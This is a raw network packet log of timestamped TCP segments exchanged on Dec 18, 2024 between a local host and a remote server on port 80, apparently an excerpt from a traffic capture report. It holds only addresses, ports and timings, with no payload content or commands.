                                                  Dec 18, 2024 14:07:46.153147936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.153886080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.153937101 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.154015064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.154876947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.154947996 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.154972076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.155570030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.155586004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.155642986 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.156083107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.156131029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.156162024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.156719923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.156774998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.156806946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.157876015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.157890081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.157918930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.158520937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.158569098 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.158679962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.159213066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.159250975 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.159476042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.160083055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.160105944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.160125017 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.160634995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.160676003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.160825968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.161314964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.161345959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.161354065 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.161817074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.161861897 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.161978960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.162586927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.162635088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.162679911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.163522959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.163568020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.163712978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.164589882 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.164660931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.164668083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.165183067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.165194988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.165226936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.165776014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.165788889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.165817976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.166152954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.166196108 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.166229963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.166836977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.166903973 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.166940928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.167707920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.167785883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.167862892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.168577909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.168623924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.168761015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.169439077 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.169490099 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.169529915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.170144081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.170190096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.170217037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.170958996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.171005964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.171037912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.171789885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.171830893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.171855927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.172617912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.172662020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.172729969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.173681974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.173706055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.173729897 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.174295902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.174339056 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.174355030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.175120115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.175184011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.175261021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.176084995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.176099062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.176134109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.176692009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.176775932 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.268944025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.269026995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.269083023 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.269334078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.269347906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.269395113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.269974947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.270018101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.270061016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.270802975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.270853996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.270900965 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.271518946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.271650076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.271698952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.272447109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.272607088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.272661924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.273191929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.273447037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.273493052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.274224997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.274239063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.274281979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.274878025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.275016069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.275062084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.275881052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.275893927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.275940895 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.276513100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.276618958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.276680946 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.277386904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.277462006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.277503967 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.278301001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.278315067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.278364897 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.279051065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.331480980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.336549997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.336565018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.336657047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.337510109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.337523937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.337569952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.337738037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.337884903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.337924004 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.338776112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.339768887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.339786053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.339827061 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.339994907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.340008020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.340039015 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.340636969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.340682030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.340825081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.341617107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.341660976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.341865063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.341877937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.341917038 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.342714071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.342729092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.342770100 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.343436003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.343450069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.343492985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.344249964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.344413042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.344465971 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.345038891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.345184088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.345227957 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.345907927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.345957994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.346028090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.346736908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.346795082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.346838951 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.347548008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.347630978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.347672939 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.348450899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.348464966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.348504066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.349169016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.349559069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.349608898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.350234985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.350301027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.350349903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.350891113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.351012945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.351053953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.351695061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.351989985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.352034092 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.352634907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.352821112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.352866888 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.353445053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.353522062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.353667021 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.354083061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.354165077 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.354222059 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.355654955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.355685949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.355787039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.356317997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.356349945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.356486082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.356858015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.356870890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.356966972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.357379913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.357434988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.357517958 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.358225107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.358349085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.358393908 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.359111071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.359153986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.359198093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.359869957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.359991074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.360038042 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.360712051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.360815048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.360862017 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.361500025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.361623049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.361670017 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.362396002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.362545013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.362593889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.363164902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.363358974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.363404989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.364002943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.364375114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.364423037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.364811897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.364834070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.364873886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.365636110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.365819931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.365874052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.366547108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.366760015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.366806030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.367297888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.367377043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.367441893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.368289948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.368304014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.368364096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.368921041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.409615040 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.460798025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.460962057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.461031914 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.461236954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.461366892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.461405039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.462019920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.462352991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.462363958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.462395906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.463125944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.463167906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.463248968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.464080095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.464091063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.464134932 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.465028048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.465040922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.465085030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.465790033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.465852976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.465991020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.466578960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.466590881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.466675997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.467273951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.467364073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.467483997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.468087912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.468136072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.468177080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.468914986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.468967915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.468976974 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.469733953 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.469782114 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.469819069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.470515013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.470570087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.470609903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.519013882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.528332949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.528429985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.528526068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.528769970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.528856039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.528901100 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.529517889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.529683113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.529735088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.530296087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.530307055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.530361891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.531352997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.531507969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.531560898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.531891108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.531997919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.532042027 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.532701015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.532949924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.532987118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.533025026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.533668041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.533715963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.533775091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.534518003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.534605980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.534641981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.535720110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.535734892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.535774946 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.536215067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.536227942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.536263943 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.536997080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.537009954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.537050962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.537980080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.538026094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.538033962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:46.538743019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.538755894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:46.538795948 CET4970780192.168.2.8176.113.115.178
